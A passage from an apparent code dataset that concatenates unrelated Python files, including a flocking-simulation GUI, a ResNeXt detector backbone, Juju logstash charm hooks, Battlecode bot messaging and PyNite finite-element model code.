column=2)\n\t\tcontrol_frame = tk.Frame(field_frame, pady=7)\n\n\t\t# all setting scales\n\t\tself.flock_settings = [\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"nimbus\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 100)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"focus\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 50)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"avoidance_distance\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 20)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"alignment_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.5)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"cohesion_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.3)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"avoidance_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.4)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"rotation_speed\",\n\t\t\t\tfrom_=0, to=3, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.7))\n\t\t]\n\t\tfor scale in self.flock_settings:\n\t\t\tscale.pack()\n\n\t\t#lighthouse settings\n\t\tself.lh_settings = [\n\t\t\tAgentTraitScale(lh_settings_frame, context, LighthouseAgent, \"nimbus\",\n\t\t\t\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\t\t\t\tlength=self.sim_width // 2, resolution=10, variable=tk.DoubleVar(self, 100)),\n\t\t\ttk.Label(lh_settings_frame, text=\"\\nLClick for Green LightHouse\\n\"\n\t\t\t\t\t\t\t\t\t\t\t \"RClick for Red LightHouse\\n\"\n\t\t\t\t\t\t\t\t\t\t\t \"MClick on a LightHouse to remove\\n\")\n\t\t]\n\t\tfor scale in self.lh_settings:\n\t\t\tscale.pack()\n\n\n\n\t\t# Field\n\t\ttk.Scale(field_frame, from_=0, to=30, length=self.sim_width, orient=tk.HORIZONTAL,\n\t\t \t\tvariable=self.fps, command=self.check_wake_up, label=\"FPS\").pack()\n\t\tself.field = tk.Canvas(field_frame, width=self.sim_width, height=self.sim_width, bg=\"black\")\n\t\tself.field.pack()\n\t\tself.field.bind(\"\", self.add_green_lighthouse)\n\t\tself.field.bind(\"\", self.del_lighthouse)\n\t\tself.field.bind(\"\", self.add_red_lighthouse)\n\n\t\t# controls\n\t\tcontrol_frame.pack()\n\n\t\ttk.Scale(control_frame, from_=1, to=100, length=self.sim_width, orient=tk.HORIZONTAL,\n\t\t \t\tvariable=self.fpop, label=\"FlockAgent population\").grid(row=0, column=0, columnspan=2)\n\n\t\ttk.Button(control_frame, text=\"Setup\", command=self.setup_sim).grid(row=2, column=0)\n\t\tself.go_stop_button = tk.Button(control_frame, text=\"Go\", command=self.go_stop)\n\t\tself.go_stop_button.grid(row=2, column=1)\n\n\tdef auto_render(self):\n\t\tself.__running = True\n\t\tself.render_all()\n\t\tfps = self.fps.get() #local copy non-atomic\n\t\tif(fps):\n\t\t\tself.__id_auto_render = self.after(int(1/fps*1000), self.auto_render)\n\t\telse:\n\t\t\tself.__running = False\n\n\tdef cancel_auto_render(self):\n\t\tself.after_cancel(self.__id_auto_render)\n\t\tself.__running = None\n\n\tdef check_wake_up(self, v):\n\t\tif(self.__running is not None and not self.__running):\n\t\t\tprint(v)\n\t\t\tif(v != 0):\n\t\t\t\tself.__running = True\n\t\t\t\tself.auto_render()\n\n\tdef render_all(self):\n\t\tfor agent in self.context.get_agents():\n\t\t\tagent.render(self.field)\n\n\tdef setup_sim(self):\n\t\tself.context.del_agents(self.context.get_agents())\n\t\tself.field.delete(tk.ALL)\n\t\toptions = dict([(s.trait, float(s.get())) for s in self.flock_settings])\n\t\tprint(options)\n\t\tfor i in range(self.fpop.get()):\n\t\t\tFlockAgent(context=self.context, pos=(random()*self.sim_width, random()*self.sim_width), rotation=np.pi * 2.0 * np.random.random(), **options)\n\t\tself.auto_render()\n\n\tdef go_stop(self):\n\t\tself.__sim_running = not self.__sim_running\n\t\tif(self.__sim_running):\n\t\t\tself.go_stop_button.configure(relief=\"sunken\")\n\t\t\tself.auto_sim()\n\t\telse:\n\t\t\tself.go_stop_button.configure(relief=\"raised\")\n\t\t\tself.after_cancel(self.__id_auto_sim)\n\n\tdef auto_sim(self):\n\t\tself.context.update()\n\t\tself.__id_auto_sim = self.after(int(1/self.tps*1000), self.auto_sim)\n\n\tdef __add_lighthouse(self, lhtype, pos):\n\t\tlhtype(self.context, pos, nimbus=100)\n\n\tdef add_green_lighthouse(self, event):\n\t\tself.__add_lighthouse(GreenLighthouse, (event.x, event.y))\n\n\tdef add_red_lighthouse(self, event):\n\t\tself.__add_lighthouse(RedLighthouse, (event.x, event.y))\n\n\tdef del_lighthouse(self, event):\n\t\tlhs = self.context.get_agents(LighthouseAgent)\n\t\tfor lh in lhs:\n\t\t\tif lh.collide_pos((event.x, event.y)):\n\t\t\t\tself.context.del_agents(lh)\n\t\t\t\tself.field.delete(*lh.id)\n","sub_path":"client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"544784844","text":"import itertools\nimport math\n\nN = int(input())\nxy = [list(map(int, input().split())) for _ in range(N)]\n\np = itertools.permutations(xy, N)\nans = 0\nfor v in p:\n for i in range(N-1):\n ans += math.sqrt((v[i][0]-v[i+1][0])**2 + (v[i][1]-v[i+1][1])**2)\nans /= math.factorial(N)\nprint(ans)","sub_path":"atcoder/abc/145/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522726324","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom model.utils.config import cfg\nfrom model.faster_rcnn.faster_rcnn import _fasterRCNN\n\nimport os\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torch.utils.model_zoo as model_zoo\nimport pdb\n\nfrom torchvision import models\n\n__all__ = ['resnext50_32x4d', 'resnext101_32x8d']\n\ndout_base_model = {\n 50: 1024,\n 101: 1024,\n}\n\ndef resnext50(pretrained=False, imagenet_weight=False):\n \"\"\"Constructs a ResNext-50_32x4d model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n print('=== Using resnext 50_32x4d ===')\n model = models.resnext50_32x4d()\n if pretrained:\n if imagenet_weight:\n print('=== use {} as backbone'.format(imagenet_weight))\n state_dict = torch.load(imagenet_weight)['state_dict']\n state_dict = exchange_weightkey_in_state_dict(state_dict)\n model.load_state_dict(state_dict)\n else:\n print('=== use pytorch default backbone')\n model = models.resnext50_32x4d(pretrained=True)\n return model\n\n\ndef resnext101(pretrained=False, imagenet_weight=False):\n \"\"\"Constructs a ResNext-101_32x8d model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n print('=== Using resnext 101_32x8d ===')\n model = models.resnext101_32x8d()\n if pretrained:\n if imagenet_weight:\n print('=== use {} as backbone'.format(imagenet_weight))\n state_dict = torch.load(imagenet_weight)['state_dict']\n state_dict = exchange_weightkey_in_state_dict(state_dict)\n model.load_state_dict(state_dict)\n else:\n print('=== use pytorch default backbone')\n model = models.resnext101_32x8d(pretrained=True)\n return model\n\n\nclass resnext(_fasterRCNN):\n def __init__(self, classes, num_layers=101, pretrained=False, class_agnostic=False, imagenet_weight=None):\n self.dout_base_model = dout_base_model[num_layers]\n self.pretrained = pretrained\n self.class_agnostic = class_agnostic\n self.num_layers = num_layers\n self.imagenet_weight = imagenet_weight\n\n _fasterRCNN.__init__(self, classes, class_agnostic)\n\n def _init_modules(self):\n if self.num_layers == 50:\n resnext = resnext50(self.pretrained, self.imagenet_weight)\n elif self.num_layers == 101:\n resnext = resnext101(self.pretrained, self.imagenet_weight)\n else:\n raise ValueError('layers should be in [50, 101].')\n\n # if self.pretrained == True:\n # print(\"Loading pretrained weights from %s\" %(self.model_path))\n # state_dict = torch.load(self.model_path)\n # resnet.load_state_dict({k:v for k,v in state_dict.items() if k in resnet.state_dict()})\n\n # Build resnext.\n self.RCNN_base = nn.Sequential(resnext.conv1, resnext.bn1, resnext.relu,\n resnext.maxpool, resnext.layer1, resnext.layer2, resnext.layer3) # until layer3\n\n self.RCNN_top = nn.Sequential(resnext.layer4) # layer4\n\n self.RCNN_cls_score = nn.Linear(dout_base_model[self.num_layers]*2, self.n_classes)\n if self.class_agnostic:\n self.RCNN_bbox_pred = nn.Linear(dout_base_model[self.num_layers]*2, 4)\n else:\n self.RCNN_bbox_pred = nn.Linear(dout_base_model[self.num_layers]*2, 4*self.n_classes)\n\n # # === fix weight\n # # Fix blocks\n # for p in self.RCNN_base[0].parameters(): p.requires_grad=False\n # for p in self.RCNN_base[1].parameters(): p.requires_grad=False\n\n # assert (0 <= cfg.RESNET.FIXED_BLOCKS < 4)\n # print('cfg.RESNET.FIXED_BLOCKS: {}'.format(cfg.RESNET.FIXED_BLOCKS))\n # if cfg.RESNET.FIXED_BLOCKS >= 3:\n # for p in self.RCNN_base[6].parameters(): p.requires_grad=False\n # if cfg.RESNET.FIXED_BLOCKS >= 2:\n # for p in self.RCNN_base[5].parameters(): p.requires_grad=False\n # if cfg.RESNET.FIXED_BLOCKS >= 1:\n # for p in self.RCNN_base[4].parameters(): p.requires_grad=False\n # # ==== === ====\n\n # def set_bn_fix(m):\n # classname = m.__class__.__name__\n # if classname.find('BatchNorm') != -1: # if batchnorm\n # for p in m.parameters(): p.requires_grad=False\n\n # # === fix weight\n # self.RCNN_base.apply(set_bn_fix)\n # self.RCNN_top.apply(set_bn_fix)\n # # === \n\n # def train(self, mode=True):\n # # Override train so that the training mode is set as we want\n # nn.Module.train(self, mode)\n # if mode:\n # # Set fixed blocks to be in eval mode\n # self.RCNN_base.eval()\n # print('train {}to{}'.format(cfg.RESNET.FIXED_BLOCKS+4, len(self.RCNN_base)))\n # for i in range(cfg.DENSENET.FIXED_BLOCKS+4, len(self.RCNN_base)): # 1->5-, 2->6- \n # self.RCNN_base[i].train()\n\n # def set_bn_eval(m):\n # classname = m.__class__.__name__\n # if classname.find('BatchNorm') != -1:\n # m.eval()\n\n # self.RCNN_base.apply(set_bn_eval)\n # self.RCNN_top.apply(set_bn_eval)\n\n def _head_to_tail(self, pool5):\n # print('head_to_tail: {}'.format(pool5.shape))\n fc7 = self.RCNN_top(pool5).mean(3).mean(2) # pool5(feature)にRCNN_TOPかけてmean(3).mean(2)\n # print('fc7: {}'.format(fc7.shape))\n return fc7\n\n# function to load weight\ndef exchange_weightkey_in_state_dict(state_dict):\n new_state_dict= OrderedDict()\n for k, v in state_dict.items():\n name=k[7:] #remove 'module.' of DataParallel\n new_state_dict[name] = v\n return new_state_dict","sub_path":"lib/model/faster_rcnn/resnext.py","file_name":"resnext.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38135590","text":"from pandas import read_csv\ndef recod_base(c,k):\n \"\"\"Использует существующий валс файл и перекодирует базу, используя столбец index\"\"\"\n df=read_csv('{}.csv'.format (c) , encoding = 'utf-8' , sep = ';',dtype = str )\n df_vals=read_csv('{}.csv'.format(k), encoding='utf-8',sep=';')\n #Заполним пустые строки значениями переменной свыше. Вдруг пригодиццо\n df_vals['variable']=df_vals['variable'].ffill()#Берет и забивает пустые ячейки в первом столбце значением которое встретил, и забивает до следующего,как только встречает другое, то используе его\n # А давайте сгруппируем\n recode=df_vals.groupby('variable').agg(lambda row: list(row))#группирует всё так,что напротив названия столбца получается список с индексами и список со значениями\n # рекодим\n for col in recode.index:#смотрим в название столбца,он является индексом\n keys=recode.loc[col]['values']#Берем значение как ключ\n values=recode.loc[col]['index']#Берем инлекс как значение для ключа\n mapRecode = dict(zip(keys, values))#Запаковываем всё в словарь\n\n df[col].replace(mapRecode,inplace=True)#БЕрем столбец,название которого записанно в cоl и меняем его значения используя словарь. Ключ - это то,что нужно заменить, а значение под ключем - на что заменить \n df.to_csv( '{}_encode.csv'.format(c) , sep=';' , index=False )#записывает полученный валс в файл\n if __name__ == \"__main__\":\n print(\"Модуль должен быть импортирован\")","sub_path":"recode.py","file_name":"recode.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"390953130","text":"#!/usr/bin/env python\n\nimport sys\n\nfrom charmhelpers.contrib.ansible import apply_playbook\nfrom charmhelpers.contrib.python.packages import pip_install\nfrom charmhelpers.core.hookenv import (\n Hooks,\n config,\n relation_set,\n status_set,\n log as juju_log,\n UnregisteredHookError,\n open_port\n)\nfrom charmhelpers.core.host import service_running\nfrom charmhelpers.fetch import apt_install\nfrom charmhelpers.contrib.charmsupport import nrpe\n\nrequired_aps = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']\nrequired_pip_packages = [\"Ansible==2.1.4.0\", \"markupsafe\"]\n\nservice_name = 'logstash'\nmsg_install_prereqs = 'Installing Ansible pre-reqs'\nmsg_install_ansible = 'Installing Ansible'\nmsg_install_service = 'Installing ' + service_name\nmsg_config_changed = 'Making configuration changes'\nmsg_service_running = 'Unit is ready'\nmsg_service_stopped = service_name + ' is stopped'\nmsg_service_failed_to_start = service_name + ' failed to start'\n\nstatus_maintenance = 'maintenance'\nstatus_blocked = 'blocked'\nstatus_active = 'active'\n\n\nplaybook = 'playbooks/site.yaml'\n\nhooks = Hooks()\n\n\n@hooks.hook('install', 'upgrade-charm')\ndef install2():\n \"\"\"\n Install a custom version of ansible for our charm.\n Because of the hack required to install python with xenial\n our install script is called install2, need to call the ansible playbook\n using the install tag.\n \"\"\"\n status_set(status_maintenance, msg_install_prereqs)\n apt_install(required_aps)\n\n status_set(status_maintenance, msg_install_ansible)\n pip_install(required_pip_packages, fatal=True)\n\n status_set(status_maintenance, msg_install_service)\n apply_playbook(playbook, tags=['install'])\n\n\n@hooks.hook('config-changed', 'elasticsearch-relation-changed')\ndef config_changed():\n status_set(status_maintenance, msg_config_changed)\n apply_playbook(playbook, tags=['config_changed'])\n\n update_nrpe_config()\n open_port(config('beats_port'), protocol='TCP')\n open_port(config('syslog_port'), protocol='TCP')\n open_port(config('tcp_port'), protocol='TCP')\n\n\n@hooks.hook('nrpe-external-master-relation-joined',\n 'nrpe-external-master-relation-changed')\ndef update_nrpe_config():\n hostname = nrpe.get_nagios_hostname()\n current_unit = nrpe.get_nagios_unit_name()\n services = [service_name]\n nrpe_setup = nrpe.NRPE(hostname=hostname)\n nrpe.add_init_service_checks(nrpe_setup, services, current_unit)\n nrpe_setup.write()\n\n\n@hooks.hook('start')\ndef start():\n \"\"\"\n Special process for the start action so that after the playbook is run\n we can update the status in juju\n \"\"\"\n apply_playbook(playbook, tags=['start'])\n if service_running(service_name):\n status_set(status_active, msg_service_running)\n else:\n status_set(status_maintenance, msg_service_failed_to_start)\n\n\n@hooks.hook('update-status')\ndef update_status():\n if service_running(service_name):\n status_set(status_active, msg_service_running)\n else:\n status_set(status_maintenance, msg_service_stopped)\n\n\n@hooks.hook('beat-relation-joined')\ndef beat_relation_joined():\n relation_set(logstash_port=config('beats_port'))\n\n\n@hooks.hook('stop')\ndef stop():\n apply_playbook(playbook, tags=['stop'])\n\n\nif __name__ == \"__main__\":\n try:\n hooks.execute(sys.argv)\n except UnregisteredHookError as e:\n juju_log('Unknown hook {} - skipping.'.format(e))\n","sub_path":"charms/logstash-deb/hooks/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495858853","text":"def colorbar_index(ncolors, cmap, labels=None, **kwargs):\n \"\"\"\n This is a convenience function to stop you making off-by-one errors\n Takes a standard colour ramp, and discretizes it,\n then draws a colour bar with correctly aligned labels\n \"\"\"\n cmap = cmap_discretize(cmap, ncolors)\n mappable = cm.ScalarMappable(cmap=cmap)\n mappable.set_array([])\n mappable.set_clim(-0.5, ncolors+0.5)\n colorbar = plt.colorbar(mappable, **kwargs)\n colorbar.set_ticks(np.linspace(0, ncolors, ncolors))\n colorbar.set_ticklabels(range(ncolors))\n if labels:\n colorbar.set_ticklabels(labels)\n return colorbar\n\ndef cmap_discretize(cmap, N):\n \"\"\"\n Return a discrete colormap from the continuous colormap cmap.\n\n cmap: colormap instance, eg. cm.jet.\n N: number of colors.\n\n Example\n x = resize(arange(100), (5,100))\n djet = cmap_discretize(cm.jet, 5)\n imshow(x, cmap=djet)\n\n \"\"\"\n if type (cmap) == str:\n cmap = get_cmap(cmap)\n colors_i = np.concatenate((np.linspace(0,1.,N), (0.,0.,0.,0.)))\n colors_rgba = cmap (colors_i)\n indices = np.linspace(0,1.,N + 1)\n cdict = {}\n for ki, key in enumerate(('red','green','blue')):\n cdict[key] = [(indices[i], colors_rgba[i-1,ki], colors_rgba[i,ki]) for i in xrange(N+1)]\n return matplotlib.colors.LinearSegmentedColormap(cmap.name + \"_%d\" % N, cdict, 1024)","sub_path":"py_functions/colorbar.py","file_name":"colorbar.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559057589","text":"import utility\n\ndef message_to_castles(robot, mesg_type):\n robot.castleTalk(mesg_type)\n # # Position requesting for pilgrims\n # if mesg_type == 0:\n # temp_store = ((robot.me.x * 1000) + robot.me.y) * 1000 + 0\n # robot.castleTalk(temp_store)\n # # Position requesting for combat units\n # if mesg_type == 1:\n # temp_store = ((robot.me.x * 1000) + robot.me.y) * 1000 + 1\n # robot.castleTalk(temp_store)\n\ndef self_communicate_loop(robot):\n robot.signal(robot.me.signal, 0)\n\ndef convert_position_to_message(pos_x, pos_y):\n return pos_x * 100 + pos_y + 6464\n\ndef convert_message_to_position(message):\n message = message - 6464\n return (message //100, message % 100)\n\ndef can_compute_others(message: int) -> bool:\n bin_str = utility.convert_to_binary(message)\n if bin_str[0] == \"0\":\n return False\n else:\n return True\n\ndef message_parsing(message: int, flag: int) -> bool:\n if flag == 1:\n return can_compute_others(message)\n else:\n # TODO: implement other flag logic\n return False\n\ndef _store_destination(dest_x: int, dest_y: int, bin_list: list) -> None:\n '''\n dest_x: abscissa of mine's location (decimal)\n dest_y: ordinate of mine's location (decimal)\n bin_list: self loop message of pilgrim as a list of string (binary\n representation)\n\n First 4 bits of bin_list are reserved for storing information about next\n move.\n '''\n x_bin = utility.convert_to_binary(dest_x)\n y_bin = utility.convert_to_binary(dest_y)\n start = 4\n # copy binary of x to self loop message\n for i in range(10, 16):\n bin_list[start] = x_bin[i]\n start += 1\n # copy binary of y to self loop message\n for i in range(10, 16):\n bin_list[start] = y_bin[i]\n start += 1\n\ndef _store_next_step(astar_path: list, bin_list: list, directions: list) -> None:\n '''\n The first 4 bits are used to store the next step\n directions (list): 12 movements of pilgrim (check pilgrim_directions in\n constant module)\n '''\n if len(astar_path) == 1:\n bin_list[3] = '1'\n for i in range(3):\n bin_list[i] = '0'\n return None\n\n step = astar_path[0]\n second_step = astar_path[1]\n dx = second_step[0] - step[0]\n dy = second_step[1] - step[1]\n ans = None\n for i in range(len(directions)):\n direction = directions[i]\n if (dx, dy) == direction:\n ans = i\n break\n step_byte = utility.convert_to_binary(ans)\n iter_ = 0\n for i in range(12, 16):\n bin_list[iter_] = step_byte[i]\n iter_ += 1\n\ndef encode_msg_with_direction(dest_x: int, dest_y: int,\n astar_path: list, directions: list) -> int:\n bin_list = ['0' for i in range(16)]\n _store_destination(dest_x, dest_y, bin_list)\n _store_next_step(astar_path, bin_list, directions)\n return utility.convert_to_decimal(\"\".join(bin_list))\n\ndef encode_msg_without_direction(dest_x: int, dest_y: int) -> int:\n bin_list = ['0' for i in range(16)]\n _store_destination(dest_x, dest_y, bin_list)\n return utility.convert_to_decimal(\"\".join(bin_list))\n\ndef decode_msg_with_direction(message: int, directions: list) -> tuple:\n binary_str = utility.convert_to_binary(message)\n direction = utility.convert_to_decimal(binary_str[0:4])\n x_destination = utility.convert_to_decimal(binary_str[4:10])\n y_destination = utility.convert_to_decimal(binary_str[10:16])\n return (direction, x_destination, y_destination)\n\ndef decode_msg_without_direction(message: int) -> tuple:\n binary_str = utility.convert_to_binary(message)\n x_destination = utility.convert_to_decimal(binary_str[4:10])\n y_destination = utility.convert_to_decimal(binary_str[10:16])\n return (x_destination, y_destination)\n","sub_path":"bc19-scaffold/bots/14.ScrapBot1/communications.py","file_name":"communications.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324338187","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 9 21:11:20 2017\r\n\r\n@author: D. Craig Brinck, SE\r\n\"\"\"\r\n# %%\r\nfrom numpy import zeros, delete, insert, matmul, subtract\r\nfrom numpy.linalg import inv\r\nfrom PyNite.Node3D import Node3D\r\nfrom PyNite.Member3D import Member3D\r\nfrom .Material import Material\r\nfrom .Viewer3D import Viewer3D\r\nfrom . import Section\r\n\r\n# %%\r\nclass FEModel3D():\r\n \"\"\"\r\n A class representing a 3D finite element model.\r\n \"\"\"\r\n#%%\r\n def __init__(self):\r\n \"\"\"\r\n Initializes a new 3D finite element model.\r\n \"\"\"\r\n \r\n self.__Nodes = [] # A list of the structure's nodes\r\n self.__Members = [] # A list of the structure's members\r\n self.__D = [] # A list of the structure's nodal displacements\r\n\r\n#%%\r\n def AddNode(self, Name, X, Y, Z):\r\n \"\"\"\r\n Adds a new node to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the node.\r\n X : number\r\n The global X-coordinate of the node.\r\n Y : number\r\n The global Y-coordinate of the node.\r\n Z : number\r\n The global Z-coordinate of the node.\r\n \"\"\"\r\n \r\n # Create a new node\r\n newNode = Node3D(Name, X, Y, Z)\r\n \r\n # Add the new node to the list\r\n self.__Nodes.append(newNode)\r\n\r\n#%%\r\n def AddMember(self, Name, iNode, jNode, E, G, Iy, Iz, J, A, ik_ref=None):\r\n \"\"\"\r\n Adds a new member to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the member.\r\n iNode : string\r\n The name of the i-node (start node).\r\n jNode : string\r\n The name of the j-node (end node).\r\n E : number\r\n The modulus of elasticity of the member.\r\n G : number\r\n The shear modulus of the member.\r\n Iy : number\r\n The moment of inertia of the member about its local y-axis.\r\n Iz : number\r\n The moment of inertia of the member about its local z-axis.\r\n J : number\r\n The polar moment of inertia of the member.\r\n A : number\r\n The cross-sectional area of the member.\r\n ik_ref : 3D coordinate (numpy 1D array), optional\r\n reference point in ik-plane of the beam (default is None)\r\n \"\"\"\r\n \r\n # Create a new member\r\n material = Material(E, G)\r\n section = Section.Generic(Iy, Iz, J, A)\r\n self.AddMemberExt(Name, iNode, jNode, material, section, ik_ref)\r\n\r\n#%%\r\n def AddMemberExt(self, Name, iNode, jNode, material, section, ik_ref=None):\r\n \"\"\"\r\n Adds a new member to the model.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n A unique user-defined name for the member.\r\n iNode : string\r\n The name of the i-node (start node).\r\n jNode : string\r\n The name of the j-node (end node).\r\n material : Material\r\n PyNite Material object\r\n section : Section\r\n PyNite Section object\r\n ik_ref : 3D coordinate (numpy 1D array), optional\r\n reference point in ik-plane of the beam (default is None)\r\n \"\"\"\r\n \r\n # Create a new member\r\n newMember = Member3D(Name, self.GetNode(iNode), self.GetNode(jNode), material, section, ik_ref)\r\n \r\n # Add the new member to the list\r\n self.__Members.append(newMember)\r\n\r\n#%%\r\n def RemoveNode(self, Node):\r\n \"\"\"\r\n Removes a node from the model. All nodal loads associated with the\r\n node and members attached to the node will also be removed.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node to be removed.\r\n \"\"\"\r\n \r\n # Remove the node. Nodal loads are stored within the node, so they\r\n # will be deleted automatically when the node is deleted.\r\n self.__Nodes.remove(self.GetNode(Node))\r\n \r\n # Find any members attached to the node and remove them\r\n self.__Members = [member for member in self.__Members if member.iNode.Name != Node and member.jNode.Name != Node]\r\n \r\n#%%\r\n def RemoveMember(self, Member):\r\n \"\"\"\r\n Removes a member from the model. All member loads associated with the\r\n member will also be removed.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member to be removed.\r\n \"\"\"\r\n \r\n # Remove the member. Member loads are stored within the member, so they\r\n # will be deleted automatically when the member is deleted.\r\n self.__Members.remove(self.GetMember(Member))\r\n \r\n#%%\r\n def DefineSupport(self, Node, SupportDX = False, SupportDY = False, SupportDZ = False, SupportRX = False, SupportRY = False, SupportRZ = False):\r\n \"\"\"\r\n Defines the support conditions at a node.\r\n \r\n Nodes will default to fully unsupported unless specified otherwise.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node where the support is being defined\r\n SupportDX : boolean\r\n Indicates whether the node is supported against translation in the global X-direction.\r\n SupportDY : boolean\r\n Indicates whether the node is supported against translation in the global Y-direction.\r\n SupportDZ : boolean\r\n Indicates whether the node is supported against translation in the global Z-direction.\r\n SupportRX : boolean\r\n Indicates whether the node is supported against rotation about the global X-axis.\r\n SupportRY : boolean\r\n Indicates whether the node is supported against rotation about the global Y-axis.\r\n SupportRZ : boolean\r\n Indicates whether the node is supported against rotation about the global Z-axis.\r\n \"\"\"\r\n \r\n # Get the node to be supported\r\n node = self.GetNode(Node)\r\n \r\n # Set the node's supports\r\n node.SupportDX = SupportDX\r\n node.SupportDY = SupportDY\r\n node.SupportDZ = SupportDZ\r\n node.SupportRX = SupportRX\r\n node.SupportRY = SupportRY\r\n node.SupportRZ = SupportRZ\r\n\r\n#%%\r\n def DefineReleases(self, Member, Dxi = False, Dyi = False, Dzi = False, Rxi = False, Ryi = False, Rzi = False, Dxj = False, Dyj = False, Dzj = False, Rxj = False, Ryj = False, Rzj = False):\r\n \"\"\"\r\n Defines member end releases.\r\n \r\n All member end releases will default to unreleased unless specified otherwise.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member to have its releases modified.\r\n Dxi : boolean\r\n Indicates whether the member is released axially at its start.\r\n Dyi : boolean\r\n Indicates whether the member is released for shear in the local y-axis at its start.\r\n Dzi : boolean\r\n Indicates whether the member is released for shear in the local z-axis at its start.\r\n Rxi : boolean\r\n Indicates whether the member is released for torsion at its start.\r\n Ryi : boolean\r\n Indicates whether the member is released for moment about the local y-axis at its start.\r\n Rzi : boolean\r\n Indicates whether the member is released for moment about the local z-axis at its start.\r\n Dxj : boolean\r\n Indicates whether the member is released axially at its end.\r\n Dyj : boolean\r\n Indicates whether the member is released for shear in the local y-axis at its end.\r\n Dzj : boolean\r\n Indicates whether the member is released for shear in the local z-axis.\r\n Rxj : boolean\r\n Indicates whether the member is released for torsion at its end.\r\n Ryj : boolean\r\n Indicates whether the member is released for moment about the local y-axis at its end.\r\n Rzj : boolean\r\n Indicates whether the member is released for moment about the local z-axis at its end.\r\n \"\"\"\r\n \r\n # Apply the end releases to the member\r\n self.GetMember(Member).Releases = [Dxi, Dyi, Dzi, Rxi, Ryi, Rzi, Dxj, Dyj, Dzj, Rxj, Ryj, Rzj] \r\n \r\n#%%\r\n def AddNodeLoad(self, Node, Direction, P):\r\n \"\"\"\r\n Adds a nodal load to the model.\r\n \r\n Parameters\r\n ----------\r\n Node : string\r\n The name of the node where the load is being applied.\r\n Direction : {'FX', 'FY', 'FZ', 'MX', 'MY', 'MZ'}\r\n The global direction the load is being applied in. Forces are 'FX', 'FY', and 'FZ'. Moments are 'MX', 'MY', and 'MZ'.\r\n P : number\r\n The numeric value (magnitude) of the load.\r\n \"\"\"\r\n \r\n # Add the node load to the model\r\n self.GetNode(Node).NodeLoads.append([Direction, P])\r\n\r\n#%% \r\n def AddMemberPtLoad(self, Member, Direction, P, x):\r\n \"\"\"\r\n Adds a member point load to the model.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member the load is being applied to.\r\n Direction : {'Fx', 'Fy', 'Fz', 'My', 'Mz'}\r\n The direction in which the force is to be applied. Note that\r\n typical beam sign convention is used. Transverse forces acting\r\n toward the beam are positive. Moments are positive if they act\r\n counter-clockwise relative to the beam's local coordinate system.\r\n Torsional point loads are not supported at this time.\r\n P : number\r\n The numeric value (magnitude) of the load.\r\n x : number\r\n The load's location along the member's local x-axis.\r\n \"\"\"\r\n \r\n # Add the point load to the member\r\n self.GetMember(Member).PtLoads.append((Direction, P, x))\r\n\r\n#%%\r\n def AddMemberDistLoad(self, Member, 